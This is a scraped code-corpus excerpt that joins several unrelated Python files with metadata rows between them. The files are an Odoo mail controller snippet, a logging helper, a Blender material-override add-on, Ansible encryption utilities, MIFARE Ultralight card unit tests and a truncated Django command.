def message_partner_info_from_emails(self, model, res_ids, emails, link_mail=False):
records = request.env[model].browse(res_ids)
try:
records.check_access_rule('read')
records.check_access_rights('read')
except:
return []
return records._message_partner_info_from_emails(emails, link_mail=link_mail)
@http.route('/mail/get_suggested_recipients', type='json', auth='user')
def message_get_suggested_recipients(self, model, res_ids):
records = request.env[model].browse(res_ids)
try:
records.check_access_rule('read')
records.check_access_rights('read')
except:
return {}
return records._message_get_suggested_recipients()
|
agpl-3.0
| 1,157,204,141,075,389,200
| 48.14094
| 123
| 0.593076
| false
| 4.159046
| false
| false
| false
|
f304646673/scheduler_frame
|
src/frame/loggingex.py
|
1
|
3302
|
import os
import sys
import inspect
import logging
import logging.config
from singleton import singleton
@singleton
class loggingex():
def __init__(self, conf_path):
error = 0
while True:
try:
logging.config.fileConfig(conf_path)
except IOError as e:
if error > 1:
raise e
if 2 == e.errno:
if os.path.isdir(e.filename):
os.makedirs(e.filename)
else:
os.makedirs(os.path.dirname(e.filename))
error = error + 1
except Exception as e:
raise e
else:
break
def log_debug(self, msg):
log_debug = logging.getLogger('logger_LogDebug') #https://docs.python.org/2/howto/logging.html
log_debug.debug(msg)
def log_info(self, msg):
log_info = logging.getLogger('logger_LogInfo')
log_info.info(msg)
def log_warning(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.warning(msg)
def log_error(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.error(msg)
def log_critical(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.critical(msg)
def log_error_sql(self, msg):
log_error_sql = logging.getLogger('logger_SQL_ERROR')
log_error_sql.critical(msg)
def LOG_INIT(conf_path):
global logger_obj
logger_obj = loggingex(conf_path)
def modify_msg(msg):
stack_info = inspect.stack()
if len(stack_info) > 2:
file_name = inspect.stack()[2][1]
line = inspect.stack()[2][2]
function_name = inspect.stack()[2][3]
new_msg = file_name + " ^ " + function_name + " ^ " + str(line) + " ^ " + msg
return new_msg
def LOG_DEBUG(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_debug(new_msg)
except Exception as e:
print new_msg
def LOG_INFO(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_info(new_msg)
except Exception as e:
print new_msg
def LOG_WARNING(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_warning(new_msg)
except Exception as e:
print new_msg
def LOG_ERROR(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_error(new_msg)
except Exception as e:
print new_msg
def LOG_CRITICAL(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_critical(new_msg)
except Exception as e:
print new_msg
def LOG_ERROR_SQL(msg):
try:
logger_obj.log_error_sql(msg)
except Exception as e:
print msg
if __name__ == "__main__":
LOG_INIT("../../conf/log.conf")
LOG_DEBUG('LOG_DEBUG')
LOG_INFO('LOG_INFO')
LOG_WARNING('LOG_WARNING')
LOG_ERROR('LOG_ERROR')
LOG_CRITICAL('LOG_CRITICAL')
LOG_ERROR_SQL("Create XXX Error")
#global logger_obj
#logger_obj.log_debug('XXXXXXXXXXXX')
print "Hello World"
|
apache-2.0
| -3,504,118,964,041,598,500
| 26.983051
| 109
| 0.574197
| false
| 3.644592
| false
| false
| false
|
lapineige/Blender_add-ons
|
Material-Advanced-Override/material_advanded_override_v0-8.py
|
1
|
7758
|
######################################################################################################
# A simple add-on that enhance the override material tool (from renderlayer panel) #
# Actualy partly uncommented - if you do not understand some parts of the code, #
# please see further version or contact me #
# Author: Lapineige #
# License: GPL v3 #
######################################################################################################
############# Add-on description (used by Blender)
bl_info = {
"name": "Material Advanced Override",
"description": 'Material Override Tools - with advanced exclude options',
"author": "Lapineige",
"version": (0, 8),
"blender": (2, 72, 0),
"location": "Properties > Render Layers",
"warning": "",
"wiki_url": "http://blenderlounge.fr/forum/viewtopic.php?f=26&t=810",
"tracker_url": "http://blenderlounge.fr/forum/viewtopic.php?f=26&t=810",
"category": "Render"}
import bpy
import blf
bpy.types.Scene.OW_only_selected = bpy.props.BoolProperty(name='Affect Only Selected Objects',default=False)
bpy.types.Scene.OW_exclude_type = bpy.props.EnumProperty(items=[('index','Material Index','',0),('group','Group','',1),('layer','Layer','',2)])
bpy.types.Scene.OW_pass_index = bpy.props.IntProperty(name='Pass Index',default=1)
bpy.types.Scene.OW_material = bpy.props.StringProperty(name='Material',maxlen=63)
bpy.types.Scene.OW_group = bpy.props.StringProperty(name='Group',maxlen=63)
bpy.types.Scene.OW_display_override = bpy.props.BoolProperty(name="Show 'Override ON' reminder",default=True)
#
def draw_callback_px(self, context):
if context.scene.OW_display_override:
font_id = 0 # XXX, need to find out how best to get this
blf.position(font_id, 28, bpy.context.area.height-85, 0)
blf.draw(font_id, "Override ON")
#
class OverrideDraw(bpy.types.Operator):
""" """
bl_idname = "view3d.display_override"
bl_label = "Display Override"
bl_options = {'INTERNAL'}
def execute(self, context):
context.area.tag_redraw()
self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_px, (self, context), 'WINDOW', 'POST_PIXEL')
return {'FINISHED'}
class OverrideSetup(bpy.types.Operator):
"""Tooltip"""
bl_idname = "render.overwrite_setup"
bl_label = "Overwrite Setup"
l_m = list()
l_mesh = list()
bpy.types.Scene.override_layer = bpy.props.BoolVectorProperty(subtype='LAYER', size=20)
@classmethod
def poll(cls, context):
return context.scene.OW_material
def execute(self, context):
context.scene.OW_display_override = True
bpy.ops.view3d.display_override()
for obj in bpy.data.objects:
if (obj.select == True)*context.scene.OW_only_selected or not context.scene.OW_only_selected:
if not obj.data.name in self.l_mesh:
self.l_mesh.append(obj.data.name)
else:
continue
if not len(obj.material_slots) and hasattr(obj.data,'materials'):
new_mat = bpy.data.materials.new('Default')
obj.data.materials.append(new_mat)
elif len(obj.material_slots):
if context.scene.OW_exclude_type == 'index':
if not obj.material_slots[0].material.pass_index == context.scene.OW_pass_index:
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
elif context.scene.OW_exclude_type == 'group' and context.scene.OW_group:
if obj.name in [g_obj.name for g_obj in bpy.data.groups[context.scene.OW_group].objects]:
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
elif context.scene.OW_exclude_type == 'layer':
if not (True in [(context.scene.override_layer[index])*(context.scene.override_layer[index]==obj.layers[index]) for index in range(len(obj.layers))]):
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
return {'FINISHED'}
def _save_mat(self, obj):
self.l_m.append( (obj,[]) )
for slot in obj.material_slots:
self.l_m[-1][1].append( (slot,slot.material) )
def _change_mat(self, context, obj):
for slot in obj.material_slots:
slot.material = bpy.data.materials[context.scene.OW_material]
class OverrideRestore(bpy.types.Operator):
"""Tooltip"""
bl_idname = "render.overwrite_restore"
bl_label = "Overwrite Restore"
l_m = []
@classmethod
def poll(cls, context):
return True
def execute(self, context):
context.scene.OW_display_override = False
for data in bpy.types.RENDER_OT_overwrite_setup.l_m:
obj, mat_data = data
for slot, material in mat_data:
slot.material = material
bpy.types.RENDER_OT_overwrite_setup.l_m = list()
bpy.types.RENDER_OT_overwrite_setup.l_mesh = list()
return {'FINISHED'}
class MaterialOverrideTools(bpy.types.Panel):
""" """
bl_label = "Material Override Tools"
bl_idname = "material_override_tools"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render_layer"
def draw(self, context):
layout = self.layout
if bpy.types.RENDER_OT_overwrite_setup.l_m:
layout.operator('render.overwrite_restore')
layout.label('Do not save before having restored the material(s)', icon='CANCEL')
layout.prop(context.scene, 'OW_display_override')
else:
layout.operator('render.overwrite_setup')
layout.prop_search(context.scene, "OW_material", bpy.data, "materials", icon='MATERIAL_DATA')
layout.prop(context.scene, 'OW_only_selected',toggle=True, icon='BORDER_RECT')
box = layout.box()
box.label('Exclude from effect:')
row = box.row()
row.prop(context.scene, 'OW_exclude_type', expand=True)
if context.scene.OW_exclude_type == 'index':
box.prop(context.scene, 'OW_pass_index')
elif context.scene.OW_exclude_type == 'group':
box.prop_search(context.scene, "OW_group", bpy.data, "groups", icon='GROUP')
elif context.scene.OW_exclude_type == 'layer':
box.prop(context.scene, 'override_layer', text='')
def register():
bpy.utils.register_class(OverrideSetup)
bpy.utils.register_class(OverrideRestore)
bpy.utils.register_class(MaterialOverrideTools)
bpy.utils.register_class(OverrideDraw)
def unregister():
if bpy.types.RENDER_OT_overwrite_setup.l_m:
bpy.ops.render.overwrite_restore() # To make sure materials will be restored
bpy.utils.unregister_class(OverrideSetup)
bpy.utils.unregister_class(OverrideRestore)
bpy.utils.unregister_class(MaterialOverrideTools)
bpy.utils.unregister_class(OverrideDraw)
if __name__ == "__main__":
register()
|
gpl-3.0
| -2,470,813,614,757,134,000
| 42.1
| 174
| 0.579144
| false
| 3.842496
| false
| false
| false
|
ownport/ansiblite
|
src/ansiblite/utils/encrypt.py
|
1
|
6355
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import stat
import tempfile
import multiprocessing
import time
import warnings
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except:
pass
from ansiblite.utils.display import Display
display = Display()
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
display.system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
from ansiblite import constants as C
from ansiblite.errors import AnsibleError
from ansiblite.utils._text import to_text, to_bytes
__all__ = ['do_encrypt']
_LOCK = multiprocessing.Lock()
def do_encrypt(result, encrypt, salt_size=None, salt=None):
if PASSLIB_AVAILABLE:
try:
crypt = getattr(passlib.hash, encrypt)
except:
raise AnsibleError("passlib does not support '%s' algorithm" % encrypt)
if salt_size:
result = crypt.encrypt(result, salt_size=salt_size)
elif salt:
if crypt._salt_is_bytes:
salt = to_bytes(salt, encoding='ascii', errors='strict')
else:
salt = to_text(salt, encoding='ascii', errors='strict')
result = crypt.encrypt(result, salt=salt)
else:
result = crypt.encrypt(result)
else:
raise AnsibleError("passlib must be installed to encrypt vars_prompt values")
# Hashes from passlib.hash should be represented as ascii strings of hex
# digits so this should not traceback. If it's not representable as such
# we need to traceback and then blacklist such algorithms because it may
# impact calling code.
return to_text(result, errors='strict')
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
# avoid race with multiple forks trying to create paths on host
# but limit when locking is needed to creation only
with(_LOCK):
if not os.path.exists(key_path):
# use a temp directory and rename to ensure the directory
# searched for only appears after permissions applied.
tmp_dir = tempfile.mkdtemp(dir=os.path.dirname(key_path))
os.chmod(tmp_dir, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
os.rename(tmp_dir, key_path)
elif not os.path.isdir(key_path):
raise AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
# avoid race with multiple forks trying to create key
# but limit when locking is needed to creation only
with(_LOCK):
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
# use temp file to ensure file only appears once it has
# desired contents and permissions
with tempfile.NamedTemporaryFile(mode='w', dir=os.path.dirname(key_path), delete=False) as fh:
tmp_key_path = fh.name
fh.write(str(key))
os.chmod(tmp_key_path, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
os.rename(tmp_key_path, key_path)
return key
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def keyczar_encrypt(key, msg):
return key.Encrypt(msg.encode('utf-8'))
def keyczar_decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise AnsibleError("decryption failed")
|
gpl-3.0
| 654,723,775,037,806,000
| 39.737179
| 307
| 0.663415
| false
| 3.849182
| false
| false
| false
|
0xquad/mfu
|
tests.py
|
1
|
18569
|
#!/usr/bin/env python3
#
# The test program for the MFU Python library.
#
# Copyright (c) 2015, Alexandre Hamelin <alexandre.hamelin gmail.com>
#
# This work is distributed under the LGPL license. See LICENSE.txt for details.
import sys
import unittest
from unittest.mock import Mock, call, patch, ANY
from ultralight import MFUCard, MFUPage, MFUPageViewProxy
class MFUTests(unittest.TestCase):
def __init__(self, *args):
super().__init__(*args)
content = (
'04AD7150'
'FADA2E80'
'8E48E000'
'00000000'
'00000000'
'31880220'
'633C0000'
'E92D2412'
'00000000'
'00000000'
'00013634'
'0000907B'
'00000000'
'00000000'
'00000000'
'00000000'
)
content = bytearray.fromhex(content)
self.card = MFUCard(bytes=content)
def test_iter_bytes(self):
iterator = iter(self.card)
firstbytes = [next(iterator) for i in range(4)]
self.assertEqual(firstbytes, [0x04, 0xad, 0x71, 0x50])
for i in range(len(self.card) - 4):
next(iterator)
with self.assertRaises(StopIteration):
next(iterator)
def test_length(self):
self.assertEqual(len(self.card), 64)
def test_hexdump(self):
output = []
def myprint(data, *args, **kwargs):
output.append(str(data))
output.append('\n')
mock_print = Mock(side_effect=myprint)
# patching sys.stdout doesn't work since the function already has
# a reference to the real sys.stdout at define time
with patch('builtins.print', mock_print):
self.card.hexdump()
expected = (
'04ad7150\n'
'fada2e80\n'
'8e48e000\n'
'00000000\n'
'00000000\n'
'31880220\n'
'633c0000\n'
'e92d2412\n'
'00000000\n'
'00000000\n'
'00013634\n'
'0000907b\n'
'00000000\n'
'00000000\n'
'00000000\n'
'00000000\n'
)
self.assertEqual(''.join(output), expected)
def test_hexdump_with_custom_output(self):
output = []
def write(data):
output.append(data)
filemock = Mock()
filemock.write.side_effect = write
self.card.hexdump(file=filemock)
expected = (
'04ad7150\n'
'fada2e80\n'
'8e48e000\n'
'00000000\n'
'00000000\n'
'31880220\n'
'633c0000\n'
'e92d2412\n'
'00000000\n'
'00000000\n'
'00013634\n'
'0000907b\n'
'00000000\n'
'00000000\n'
'00000000\n'
'00000000\n'
)
self.assertEqual(''.join(output), expected)
def test_dump(self):
output = []
def write(data):
output.append(data)
filemock = Mock(sys.stdout)
filemock.write.side_effect = write
self.card.dump(filemock)
expected = (
b'\x04\xad\x71\x50'
b'\xfa\xda\x2e\x80'
b'\x8e\x48\xe0\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x31\x88\x02\x20'
b'\x63\x3c\x00\x00'
b'\xe9\x2d\x24\x12'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x01\x36\x34'
b'\x00\x00\x90\x7b'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
)
self.assertEqual(b''.join(output), expected)
def test_page_view_is_singleton(self):
view1 = self.card.pages
view2 = self.card.pages
self.assertIs(view1, view2)
def test_get_byte_by_index(self):
self.assertEqual(self.card[0], 4)
self.assertEqual(self.card[4], 0xfa)
self.assertEqual(self.card[8], 0x8e)
self.assertEqual(self.card[47], 0x7b)
self.assertEqual(self.card[-1], 0)
self.assertEqual(self.card[-len(self.card)], 4)
def test_get_bytes_by_slice(self):
data = self.card[:4]
self.assertEqual(data, b'\x04\xad\x71\x50')
data = self.card[10:12]
self.assertEqual(data, b'\xe0\x00')
data = self.card[60:]
self.assertEqual(data, b'\x00\x00\x00\x00')
def test_get_bytes_by_invalid_index(self):
for i in (str, dict, list, tuple, set, bytes, bytearray,
complex, lambda: None, object()):
with self.assertRaises(TypeError):
self.card[i]
with self.assertRaises(IndexError):
self.card[-len(self.card)-1]
with self.assertRaises(IndexError):
self.card[len(self.card)]
def test_get_page(self):
self.assertEqual(bytes(self.card.pages[0]), b'\x04\xAD\x71\x50')
def test_byte_by_getitem(self):
self.assertEqual(self.card[0], 0x04)
def test_bytes_by_slice(self):
self.assertEqual(self.card[:2], b'\x04\xAD')
def test_basic_attributes(self):
self.assertEqual(self.card.id, 0x04ad71fada2e80)
self.assertEqual(self.card.manufacturer, 0x04)
self.assertEqual(self.card.bcc0, 0x50)
self.assertEqual(self.card.bcc1, 0x8e)
self.assertEqual(self.card.id0, 0x04)
self.assertEqual(self.card.id1, 0xad)
self.assertEqual(self.card.id2, 0x71)
self.assertEqual(self.card.id3, 0xfa)
self.assertEqual(self.card.id4, 0xda)
self.assertEqual(self.card.id5, 0x2e)
self.assertEqual(self.card.id6, 0x80)
def test_first_pages_are_readonly(self):
for p in [0, 1]:
self.assertTrue(self.card.pages[p].readonly)
def test_locked_pages_are_read_only(self):
self.skipTest('not implemented')
#self.assertTrue(card.otp_locked)
#self.assertTrue(card.pages4to9_blocked)
#self.assertFalse(card.pages10to15_blocked)
#self.assertFalse(card.otp_blocked)
def test_init_default_empty(self):
# initialized to all zeroes
card = MFUCard()
self.assertEqual(bytes(card), b'\x00' * 64)
def test_init_one_param_only(self):
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, file=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, hexfile=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(file=1, hexfile=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, file=1, hexfile=1)
def test_init_bytestring(self):
# initialized with bytes, must be 64 bytes
card = MFUCard(bytes=b'\x01' * 64)
self.assertEqual(bytes(card), b'\x01' * 64)
def test_init_bytes(self):
card = MFUCard(bytes=bytes(64))
self.assertEqual(bytes(card), b'\x00' * 64)
card = MFUCard(bytes=bytearray([i for i in range(64)]))
self.assertEqual(list(card), [i for i in range(64)])
def test_init_from_file(self):
# load from a 64-byte binary file
content = b'\x01\x02\03\x04' * 16
fp_mock = Mock(sys.stdin)
fp_mock.fileno.return_value = 3
with patch('builtins.open', return_value=fp_mock) as mock_open, \
patch('os.read', return_value=content) as mock_sysread:
card = MFUCard(file='card.bin')
self.assertEqual(bytes(card), content)
def test_init_from_file_descriptor(self):
def sysread(desc, n):
return b'\x01' * n
with patch('os.read', wraps=sysread) as mock_sysread:
card = MFUCard(file=3)
mock_sysread.assert_called_with(3, ANY)
self.assertEqual(bytes(card), b'\x01' * 64)
def test_init_from_hexfile(self):
# load from an ASCII hex file, spaces ignored, case-insensitive
content = b'0badc0de' * 16
fp_mock = Mock(sys.stdin)
fp_mock.fileno.return_value = 3
with patch('builtins.open', return_value=fp_mock) as mock_open, \
patch('os.read', return_value=content) as mock_sysread:
card = MFUCard(hexfile='card.txt')
self.assertEqual(bytes(card), b'\x0b\xad\xc0\xde' * 16)
def test_init_from_hexfile_file_descriptor(self):
def sysread(desc, n):
if not hasattr(sysread, 'filepos'):
sysread.filepos = 0
filedata = (
b'00010203'
b'01020304'
b'02030405'
b'03040506'
b'04050607'
b'05060708'
b'06070809'
b'0708090a'
b'08090a0b'
b'090a0b0c'
b'0a0b0c0d'
b'0b0c0d0e'
b'0c0d0e0f'
b'0d0e0f00'
b'0e0f0001'
b'0f000102'
)
chunk = filedata[sysread.filepos:sysread.filepos+n]
sysread.filepos = min(sysread.filepos + n, len(filedata))
return chunk
with patch('os.read', wraps=sysread) as mock_sysread:
card = MFUCard(hexfile=3)
mock_sysread.assert_called_with(3, ANY)
expected = b''.join(bytes([i, (i + 1) % 16,
(i + 2) % 16,
(i + 3) % 16])
for i in range(16))
self.assertEqual(bytes(card), expected)
class MFUPageTests(unittest.TestCase):
def __init__(self, name):
super().__init__(name)
card = MFUCard(bytes=bytes([1,2,3,4]*16))
self.page = MFUPage(card, 0)
def test_iter_bytes(self):
byteiter = iter(self.page)
b = next(byteiter)
self.assertEqual(b, 1)
b = next(byteiter)
self.assertEqual(b, 2)
b = next(byteiter)
self.assertEqual(b, 3)
b = next(byteiter)
self.assertEqual(b, 4)
with self.assertRaises(StopIteration):
next(byteiter)
def test_as_list(self):
bytelist = list(self.page)
self.assertIsInstance(bytelist, list)
self.assertEqual(bytelist, [1, 2, 3, 4])
def test_slice(self):
self.assertEqual(self.page[0], 1)
self.assertEqual(self.page[1:-1], b'\x02\x03')
@unittest.skip('item assignment is not implemented')
def test_set_bytes_types(self):
self.assertNotEqual(self.page[0], 99)
self.page[0] = 99
self.assertEqual(self.page[0], 99)
self.page[0] = b'\x99'
self.assertEqual(self.page[0], 0x99)
@unittest.skip('item assignment is not implemented')
def test_set_bytes_negative_index(self):
self.assertNotEqual(self.page[-1], 99)
self.page[-1] = 99
self.assertEqual(self.page[-1], 99)
@unittest.skip('item assignment is not implemented')
def test_set_bytes_slice_value_types(self):
self.assertNotEqual(self.page[:2], b'\x88\x99')
self.page[:2] = bytes([0x88, 0x99])
self.assertEqual(self.page[:2], b'\x88\x99')
self.page[:2] = bytes([0x10, 0x20])
self.assertEqual(self.page[:2], b'\x10\x20')
self.page[:2] = b'\x11\x21'
self.assertEqual(self.page[:2], b'\x11\x21')
self.page[:2] = [0x12, 0x22]
self.assertEqual(self.page[:2], b'\x12\x22')
class C:
def __iter__(self):
return next(self)
def __next__(self):
yield 0x13
yield 0x23
self.page[:2] = C()
self.assertEqual(self.page[:2], b'\x13\x23')
@unittest.skip('item assignment is not implemented')
def test_set_bytes_invalid_value(self):
for t in (str, complex, float, set, list, tuple, dict):
with self.assertRaises(ValueError):
self.page[0] = t()
with self.assertRaises(ValueError):
self.page[0] = 256
with self.assertRaises(ValueError):
self.page[0] = -1
@unittest.skip('item assignment is not implemented')
def test_set_bytes_invalid_index(self):
for t in (str, complex, float, set, list, tuple, dict):
with self.assertRaises(TypeError):
self.page[t()] = 0
with self.assertRaises(ValueError):
self.page[5] = 0
def test_invalid_index(self):
for t in (str, list, set, dict, complex, object):
with self.assertRaises(TypeError):
self.page[t()]
def test_to_hex(self):
hexstr = self.page.to_hex()
self.assertEqual(hexstr, '01020304')
def test_to_int(self):
value = self.page.to_int()
self.assertEqual(value, 0x01020304)
def test_length(self):
self.assertEqual(len(self.page), 4)
def test_init_invalid_page(self):
card = MFUCard()
with self.assertRaises(ValueError):
MFUPage(card, -1)
with self.assertRaises(ValueError):
MFUPage(card, 16)
def test_init_invalid_card(self):
card = object()
with self.assertRaises(TypeError):
MFUPage(card, 0)
def test_readonly(self):
card = MFUCard()
pages = [MFUPage(card, i) for i in range(16)]
for p in (0, 1):
self.assertTrue(pages[p].readonly)
for p in range(2, 16):
self.assertFalse(pages[p].readonly)
card = MFUCard(bytes=
b'\x00\x00\x00\x00' * 2 +
# lock bytes value = 0x55aa
# meaning: pages 5, 7, 8, 10, 12, 14 are LOCKED
# pages 4, 6, 9, 11, 13, 15 are not locked
# otp locking protection is off
# pages 9-4 locking protection is ON
# pages 15-10 locking protection is off
# otp area is LOCKED
b'\x00\x00\xaa\x55' +
b'\x00\x00\x00\x00' * 13
)
pages = [MFUPage(card, i) for i in range(16)]
for p in (0, 1):
# readonly pages
self.assertTrue(pages[p].readonly)
for p in (5, 7, 8, 10, 12, 14):
# locked pages
self.assertTrue(pages[p].readonly)
for p in (4, 6, 9, 11, 13, 15):
# pages not locked
self.assertFalse(pages[p].readonly)
class MFUPageViewProxyTests(unittest.TestCase):
def __init__(self, name):
super().__init__(name)
self.card = MFUCard()
def test_length(self):
self.assertEqual(len(self.card.pages), 16)
def test_pages_proxy(self):
self.assertIsInstance(self.card.pages, MFUPageViewProxy)
def test_page_by_index(self):
self.assertIsInstance(self.card.pages[0], MFUPage)
self.assertIs(self.card.pages[-1], self.card.pages[15])
def test_pages_by_slice(self):
pages = self.card.pages[:2]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[10:]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 6)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[8:10]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[10:8:-1]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[:1]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 1)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
def test_page_by_invalid_index(self):
with self.assertRaises(IndexError):
self.card.pages[16]
for t in (object, str, float, complex, bytes, bytearray):
with self.assertRaises(TypeError):
self.card.pages[t()]
def test_page_iterator(self):
iterable = iter(self.card.pages)
item = next(iterable)
self.assertIsInstance(item, MFUPage)
self.assertIs(item, self.card.pages[0])
items = list(iterable)
self.assertEqual(len(items), 15)
for i, p in enumerate(items):
self.assertIs(p, self.card.pages[i + 1])
def test_set_page_from_int(self):
self.card.pages[0] = 0x11223344
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_from_bytes(self):
self.card.pages[0] = bytes([0x11, 0x22, 0x33, 0x44])
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
self.card.pages[0] = b'\x55\x66\x77\x88'
self.assertEqual(self.card.pages[0].to_int(), 0x55667788)
self.assertEqual(self.card.pages[0].to_hex(), '55667788')
def test_set_page_from_bytearray(self):
self.card.pages[0] = bytearray([0x11, 0x22, 0x33, 0x44])
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_from_string(self):
self.card.pages[0] = '\x11\x22\x33\x44'
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_with_invalid_value(self):
for t in (object, complex, float, dict, set, list, tuple):
with self.assertRaises(ValueError):
self.card.pages[0] = t()
with self.assertRaises(ValueError):
self.card.pages[0] = None
def test_set_page_with_invalid_int_index(self):
with self.assertRaises(IndexError):
self.card.pages[len(self.card.pages)] = 0
def test_set_page_with_invalid_index(self):
for t in (str, object, complex, float, dict, set, list, tuple):
with self.assertRaises(TypeError):
self.card.pages[t()] = 0
def test_set_page_slices_unsupported(self):
with self.assertRaises(NotImplementedError):
self.card.pages[:2] = [0, 0]
unittest.main()
|
lgpl-3.0
| -3,854,851,223,214,129,000
| 29.743377
| 79
| 0.557865
| false
| 3.372503
| true
| false
| false
|
AlexStarov/Shop
|
applications/bitrix/management/commands/1cbitrix.py
|
1
|
12839
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
import xml.etree.ElementTree as ET
from time import sleep
import os
from applications.product.models import Category
__author__ = 'AlexStarov'
def search_in_category(name, id_1c, parent=None, ):
try:
cat = Category.objects.get(title=name, id_1c=id_1c, parent=parent)
return cat
except Category.DoesNotExist:
cat = Category()
cat.title = name
if parent:
cat.parent = parent
cat.id_1c = id_1c
# cat.save()
return None
except Category.MultipleObjectsReturned:
cats = Category.objects.filter(title=name, id_1c=id_1c, parent=parent)
if len(cats) > 1:
raise 'MultiCat'
elif len(cats) == 1:
return cats[0]
elif len(cats) == 0:
try:
cat = Category.objects.get(title=name, parent=parent)
except Category.DoesNotExist:
cat = Category()
cat.title = name
if parent:
cat.parent = parent
cat.id_1c = id_1c
# cat.save()
return None
class Command(BaseCommand, ):
from optparse import make_option
option_list = BaseCommand.option_list + (
make_option('--id', '--pk', '--delivery_id', '--delivery_pk',
action='store', type='int', dest='delivery_pk',
help=''),
make_option('--t', '--delivery_test', '--test',
action='store_true', dest='delivery_test',
help=''),
make_option('--g', '--delivery_general', '--general',
action='store_true', dest='delivery_test',
help=''),
)
#self.verbosity = int(options.get('verbosity'))
#def add_arguments(self, parser):
